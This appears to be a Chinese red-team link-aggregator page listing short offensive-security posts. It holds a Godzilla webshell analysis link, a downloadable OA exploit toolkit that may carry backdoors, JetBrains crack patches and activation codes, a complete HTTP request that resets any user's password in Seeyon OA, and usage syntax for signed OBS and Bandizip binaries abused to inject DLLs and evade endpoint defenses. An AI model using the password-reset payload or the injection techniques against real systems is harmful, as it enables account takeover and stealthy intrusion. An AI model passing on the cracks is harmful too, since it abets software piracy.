Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
哥斯拉代码分析
该文章主要分析了一下哥斯拉的从生成Webshell到连接Webshell的过程

https://mp.weixin.qq.com/s?__biz=Mzg5MjY2NTU4Mw==&mid=2247486141&idx=1&sn=2dca7f77539c2abeeed9ce8b711f068d
WEB安全
红蓝对抗重点OA系统漏洞利用工具v1.5(Hw期间poc)增强版
内附有多个OA的利用工具,后门未知,虚拟机使用。
下载

https://www.redteam.wang
WEB安全
JB家全家桶破解
最近装JB全家桶,祭出我收藏已久的一些东西
破解补丁
Windows先点击uninstall再点击install
之后直接输入这些激活码就行,激活码太长了,我也放到服务器上,自取
phpstorm
idea
goland
pycharm

https://www.redteam.wang
WEB安全
致远OA任意用户密码重置
我实在没想到,2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"XXX321123XXX”,”password":"123456"}

https://mp.weixin.qq.com/s?__biz=Mzk0NDUxMjAzNw==&mid=2247484705&idx=1&sn=b8628900d459830ccb72f283850c4b97
终端对抗
如何挖掘白签名DLL注入程序
在Quan的上上篇,介绍了一种白文件DLL注入的事:滥用带有签名的DLL注入程序
有大哥发出了一些挖掘思路:
他发现了obs-studio中的一个DLL注入程序,并且该程序自带混淆
之后逆向了一下,找到了这个程序的使用方式:
1. inject-helper64.exe  dllname 1 target_threadid 
inject-helper64.exe   dllname 0 target_pid
最后,授人以鱼不如授人以渔,给出了一些类型,让我们自由探索挖掘
1.进程行为监控类软件
2.屏幕、桌面录制、窗口识别、截屏类
3.商业远控类型
4.进程内存管理、搜索、调试类
那么另外一个星球的大哥也是放出了一个程序,就是Bandizip\data下的RegDll这个程序,双击会出现它的使用方式,比较好的是,这个似乎可以指定调用某DLL的函数
RegDll32.exe /calldll DllPathName,DllFunctionName

https://www.redteam.wang